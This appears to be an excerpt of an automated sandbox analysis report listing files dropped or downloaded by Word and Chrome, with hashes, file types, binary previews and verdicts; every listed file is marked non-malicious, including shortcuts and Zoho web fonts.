                                                      SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Word 2007+
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                      SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                      SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                      SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Word 2007+
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                      SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                      SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                      SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):16
                                                      Entropy (8bit):2.771782221599798
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:3B16E9648F3B7DAFA340BCC881915BFB
                                                      SHA1:F8C0B28679B0C71FAAE77BE7CE81FE796E7E6E51
                                                      SHA-256:0114438C2EB5EB5DCEF887D31DC2D717F237254E8E83AD1E949660BF41C6AD45
                                                      SHA-512:53A514B95AE45B998B334FD7CD4A6E2A31A7630795F852A659083D6C32BFA467BDA04C96B7FF7B130841BE1B96AD5084E939ECFBABE6C2C61E35207239E9C685
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:..n.o.r.d.i.....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):12
                                                      Entropy (8bit):0.41381685030363374
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:E4A1661C2C886EBB688DEC494532431C
                                                      SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                      SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                      SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:............
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:E4A1661C2C886EBB688DEC494532431C
                                                      SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                      SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                      SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:............
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 16:36:12 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2675
                                                      Entropy (8bit):3.9713504610287975
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:54744DD7D14735A7A56F23A6956EDBC3
                                                      SHA1:3D4B931C7884586094DFC45771A8F4F6130664DA
                                                      SHA-256:33DDA3F3A9C3C1EBD8A876B1CF835725492AC9F6E0165E229515C33B5FEB124F
                                                      SHA-512:29B89BCCA0B9BB42F230602BB752FE9CFAA1D699A499C540652025821356FC0E70119DFF52629A70798A0C938CFD75EB93F72B643055A51CE0625B959F8E2534
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:L..................F.@.. ...$+.,.......V.L......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Yr.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y......M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y.............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............eP......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 16:36:12 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2677
                                                      Entropy (8bit):3.9869516853436036
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:B36E559C60F215C5AD6A1E8FB241AA08
                                                      SHA1:44CE06558C0EC4939995BFA63B7CFDDF33C62CB1
                                                      SHA-256:DA01A2B0AE281C3BCD373EE3C3301EC99D686789646796369D59FBBDCB615D86
                                                      SHA-512:C234996D68E3AB485B066EFD77D678A35E46582CD28807FBBD2DBFB08D65619A2B65B6265F8C5F8E24067E5E77A0449801E6BD36AB4E42F6E3835C1C1739A8CE
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:L..................F.@.. ...$+.,.....2yV.L......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Yr.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y......M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y.............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............eP......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 09:23:19 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2691
                                                      Entropy (8bit):3.9979987158658377
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:AD80D2231D180277236183552CF760CA
                                                      SHA1:F4F86936C24FF3D96DFC1C4EEFB5E13076627815
                                                      SHA-256:1D3CD467D5CC1E9FD71EF6E6EE9286AB8FBF69BCA7527B2DD0978AEC39542109
                                                      SHA-512:143F6659C11B61837DEB743E84487EEE0D087035462A647EEE7DEB6DBD98AF5A26CC1FF79EA5D0EED98A45D74815379452085739FF38B03CD0475FDB83D1646E
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:L..................F.@.. ...$+.,....?.4 ?.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Yr.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y......M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y.............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.R.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............eP......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 16:36:12 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2679
                                                      Entropy (8bit):3.983533875473525
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:AF610A2C494710D7DCB34B5CF44ADEBC
                                                      SHA1:4E9E1EE4ABD62F7506B4F69230702AE0A34E39AF
                                                      SHA-256:B2ADB14025991948BB4A2A42474DBAC8C783DB1E097FC25918DF73DC6D0E641E
                                                      SHA-512:101B37432EC31A4DDFEABC1751F1C2A7DDA569656F5BA6A15DDB67155213ED9ECFC6DFBBC09E51A9B0D2CE71EEB75815E27D1954C8A8CDA4D21593DEF409B136
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:L..................F.@.. ...$+.,....,.sV.L......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Yr.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y......M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y.............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............eP......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 16:36:12 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2679
                                                      Entropy (8bit):3.974622515699988
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:1FED779FB89EF7D45AAF122F6BC05106
                                                      SHA1:93FC9A34882350A19FB6843CF8733C9F0F4B8A33
                                                      SHA-256:2A829A42EDF00860DDB68E075DA691881B4B91000661C59C8888DE94B4A6AF23
                                                      SHA-512:CCA8F457F478F4C883A1E4B57F09AE08CA1B40A8D627147E58A57D4969F290701FDC9D8EE0DBAA1BDBA67C781324001D573AD012E2C0EA00503098C0DA8211DF
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:L..................F.@.. ...$+.,......~V.L......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Yr.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y......M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y.............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............eP......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 16:36:12 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2681
                                                      Entropy (8bit):3.98444022234235
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:23F06ACC79823D8B7436790C1647117E
                                                      SHA1:621CAB34A764BC4B88D184E27E2F92098E6BE69A
                                                      SHA-256:C3DD963B3DD2577C5BFB557E759AB5DC4044415A1DD05ECE09DD12EBB93271C6
                                                      SHA-512:F8E0868098AA91D04411305CD079A335ADFAFE81E2C0D3E1CE604D34FEF499E7B0548B10899826551C3B24B382D73830FAF8728807AD6B5887928C380B3E705E
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:L..................F.@.. ...$+.,.....#dV.L......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Yr.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y......M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y.............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............eP......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):4.778534180927242
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:2CD55537F25785105230EB32974B79B6
                                                      SHA1:830117C5A9A777F8D9D5A3B2DA26BFF48D12089F
                                                      SHA-256:2A4E31974550C5A6E620ACFB793D43A1884A3385699F6C775082052FD10EF681
                                                      SHA-512:6A8C9992747C96EC4479DD22444D60725337B857EB13D6D4DD32CB2AA765D8792B74A6FBC0E97112BFD1073846BBC1A4B0270BAD1164F4E3FD3D69C698D77448
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:..........................................................mtD.5U.@...\..r.......1...U..~J..?...Z.a......p..N._s.....!s....c.J.a.L........F.....}.i....(X...=Gi
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 146884, version 2.0
                                                      Category:downloaded
                                                      Size (bytes):146884
                                                      Entropy (8bit):7.997992566116256
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:501927141BE7EA6E7C96DF5A48F0AB0B
                                                      SHA1:EB079A5F8AEE5E9DEDA1D2142FDF044D63AC022C
                                                      SHA-256:9DBFEA5FF552109B3040100F580B74F16FBD3C4A00C0306C961054FACA6F10E9
                                                      SHA-512:C47569C1A83D9964B75D22D19BDE503C5835034821435DD23A8CD10B70DCCB5F098B6339AFE5A6B4D38985A26BA09E88FA92D0A9AC80F405846A5A525E7EB5C5
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://webfonts.zohowebstatic.com/liberationserifbolditalic/font.woff2
                                                      Preview:wOF2......=........p..=W........................?FFTM.......*..b.`..6..X..4.....`..&.6.$..L..P.. ..t...O...[.........I.f.....*...m.=)j.8.j..A}..i.]#.. T....clG!.-.SL~7.M.7...............C..t.B.....?bB...P....>&.H3...U.A..Cd.../.P..nA.cf..A......;.0<T..F...1.a.,h09......f4#..)'v..y.9V......u.H.z.R..=..V.].....V.,\.X.V..*...^..z.Q.M.&.S....Yac.vu.<+..@.....(......6.Pg~yJ.'._..d...U.-..11?]K.-..Hn.1..T]...h.h.?)QF....].b=$.}F....kg......{B).c..af....L.b.....L.K...f.U.C..7I...i..nH+..z.. MA.+K......33..3b..I..].........;..o.R.xJ.....(^.,zE.O.U...Y.h.q.L.-....~.S(.n....+4>;..b..X..Q.O....].M..=.'.f.7,...E........K.Dl.=.....+..!{.E.{%..n...a.axU.....Y..~.7.Y7d....Gcn. ........C.u,....}.....n.....&...A..U..Ym...U../...."$..FM.;.`..iAl..4..6a..R....2.b...u..*..w.....m".!,....]..y.....F...6=v.0........#<.8..s.|..Z31..r...$S....-..:b.Gg.~G.._j..|.$.V..b.....oh..|'....'..5..\UU..D...4. ...:/..Y...c. ..od:J.....c..d..N.N.9....O_.T}....N.o.......&.N.T.......+`
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 140992, version 2.0
                                                      Category:downloaded
                                                      Size (bytes):140992
                                                      Entropy (8bit):7.998149003597941
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:9D50440B3D2B8445C9360BE17F0B0468
                                                      SHA1:04C25BF598807FEA5DB7306D435A5FF9CEC2D124
                                                      SHA-256:9A6A7FB747AD6FB0741ED817ED765C44FB8DD021B00A403C3AC5AD0F8465F43C
                                                      SHA-512:765A6D3C23BF7BF0B6B91B9FC4A378A5C2997A0F8BE9BCB346F87DA6F77BC49C6C31A79AEEC79B5BA0BE997C72B1EA7E6C80C45B0A2D584A729B53EBF143466D
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://webfonts.zohowebstatic.com/liberationserifbold/font.woff2
                                                      Preview:wOF2......&.......}...&T........................?FFTM.......Z..P.`..6..X..4.....\..L.6.$..@..D.. ..8...2..I[...z.=...:.....#|[W.V~.Y.........!-....>....x.h......fY...............{J6..AW...D.*JD.s..Q..L..y...9d..E..R&..&.$C..v.........s...BTK.:.....@!D!......a.v...r1."...O .M....i3.Qf..0.HYC.........d>|...IjA..q..e...k...%*X.....+..|:...PDh.I{.`.#.#.9A..).Yo.@g|~.#Bu..VeR.e".1B.F~G...BG.f.z=..o.~c...^.^E..r<.#.0..?....d>.D.Q......qvB......QM&..]...4.<......[.w.%f.......mz..}..$.e..#^r.)3.HFg...E.z^\u.T ...s.-.D2!..H..sJ..aL.F..-(.j#W.xi....,..D.%....~....{!>.@..A.9S:..Q....G....O.p..dECR..p..@.9.uG..#.X.Kv.f..EL..SrC..T0./.H...=.?.qk...6.@.x.aHj4.0.0>a"..K....N..N......T....1<$..p{.%.M......3...HR*L{.J*t^{}/.....Xn*..n...L....:..}R..f.m.{.....B&I.$.....y.p......?e.B..~.|s.a........5,3....dH...INTf.c...)f.p.&(..E.bI...(.Y..Sd.Z.....$ia.I........x.[i....$.Op..B.dY.Y.ex.Y.^.g.>..-z....PUUU%H...$I.....$IH.(...q....,.4M3$.;d.Q..)....Z.r..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 258168, version 2.22937
                                                      Category:downloaded
                                                      Size (bytes):258168
                                                      Entropy (8bit):7.9985499366543475
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:09A1D404DBCF57559515C0F5AF7B0E2D
                                                      SHA1:60950E816C0B4B5A921C6268EDC8C5714C9283D9
                                                      SHA-256:5777D35FCAED8D6C019F004D14EABFD75C1411D4A231292B8E13DF145BB7A912
                                                      SHA-512:CF930C0769B8A13413F87745AC25A54802A332E1B76746DE8E56DF238228B211B24643FD0655A847BE067C6A5A9B829FFEC677AE0F8F0A0D7BA733F7C0A14AD0
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://webfonts.zohowebstatic.com/dejavusans/font.woff2
                                                      Preview:wOF2.......x......I.......Y.....................?FFTM..........^..>.V..f..~..+..........6.$...f...... ......u..h[ c.....$.3....l.....H[.1..m.{.,,.(...j..t....rU......T.(.G.....E.........................$....).$........{..@........(Ea..I...jh.x....-x.6:..T.``...P..+z*..$..a7".n...~.d....4KA.&..............._.E...sd./smUnIW8..W...~.oB0.7J.h]qb.,...;va....4.!#..../.d.....FqX.G.....tu.VE.<.+.q..+.boy...&7..O...9.|_Hz1.....%F..&.tr{=N..'.G...p.9....(+.J..o".7..w...m.!..B .dEX...jYo..g.n....z...&.....*....F...F.....qo.....{O.s.c.....4.>....{(lu3....~...F...{O...*+.d~.......#E~.|..g.}...=...B..j..G.....v.A.....cEX.V.a.....'....%n.7.....7...z=...?.n..aEX.wOV...+Y^%;..d...%...kw.;. .S8U........C....+..1...7..$[......wp...;.z.G...c...(..|..J.j.....+.)Y.).2.. .m5nK....F.b.*...c...M..G&.W."..y...d.iuG......K.xn.e...8.xfD.+.. t..9Z(6N...=....&...D..U..9.0-Y...WvB..6..A[...9u.9#..m{.SX......g...N....=...AR.~b/.r...4....O.-.Lk..)^VF_|......G....C..9..{P.W...>..8..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 72740, version 2.8978
                                                      Category:downloaded
                                                      Size (bytes):72740
                                                      Entropy (8bit):7.997063667705034
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:4C5229B81CED399EAB0804408F2C3C62
                                                      SHA1:C145564683735D0AB92F1A553FDD9607F3702A26
                                                      SHA-256:5AF331A730B5CAEE3CFD235C47CD07B1C36A61A31E8613CDA0484400732F63CD
                                                      SHA-512:CC12E7D38CFB426558F6BD857A16E36388303F545F875961B0C8AD9F1CBD8AFE9FA8C1648F016721384F24E538895E66DB81F6EDE6A49DF1E7CE9D070F218B3C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://webfonts.zohowebstatic.com/robotobolditalic/font.woff2
                                                      Preview:wOF2.......$..............#.....................?FFTM..~...$..L.`....J..<.....|..F.6.$..8..... ..N..f...[.....c..=@4\Q;G..*u..}..s.1...U=d.>B......;^..m.D...zv.......L*.,.]e'E....Qx0....0fY.....J..1"c..!........i.D...Z.. .I.,...P.....j..x..8%..Z....]cTI.........U.TP9.......S.tP....p.F.ZFY.v.[....;w..O.3.j...7....w5.$.hp.w...i.f..h)..4....I..4.7c...pL.".).s[.4C.*...sU4M......mB.~........(..a.;&.....U..*nx.lI.S%/|"l2...-v."..p...!.l^.QV..0.H|.X.y.w|.5W.P...l"..N.~...&...#........q..!...l.Y...?QK..b...L..r.{Iz.5....inT/..L].TW.iy.:n.U.....Q.A..<..[...LC.q.|......{..V.).%t@..$...hs<.....7.e.ZXb..%.....h.%.0.N=.@D....%,D..LN..0..1..a.Vn.'~m....a...D.ED@.@.^....T......<.3......J......._..[].$.d.....H1q. Y........m,.6...G.H.H...FEJ.O..i"#-@lLTP^.$J.E.{....]..;...J..-l...M.J,LM.8.G_$.*x..{.]3..s...)M.X.h....F0.Akm6.p.{Jd.....77 .e.m....s.{.\.9..i..D..^......G.*A...:vd.,Y........S.y..*......e$o....s...X.h.E..P..(r..,......6D..9...#.t. zR....#(...Dr...aM.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 225860, version 2.22937
                                                      Category:downloaded
                                                      Size (bytes):225860
                                                      Entropy (8bit):7.99814967568476
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:1643614D38A50F3006461B318C7E4B51
                                                      SHA1:A8F53163645CB551E61C3A6B3289D832942B74B8
                                                      SHA-256:831A0D85449BDA9A73E04736C12666758D7464611B562536F6737B6A5D88DA5F
                                                      SHA-512:ED60ED93EA46E52F113F4B6486DA40BDB8E83E9FB7E9CAF5D82E5EAF74B617C9B3993611A2E3AC1CB22C0F8B80CD17CD1B58ED4765218501A2C7C4431AD9DF34
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://webfonts.zohowebstatic.com/dejavusansoblique/font.woff2
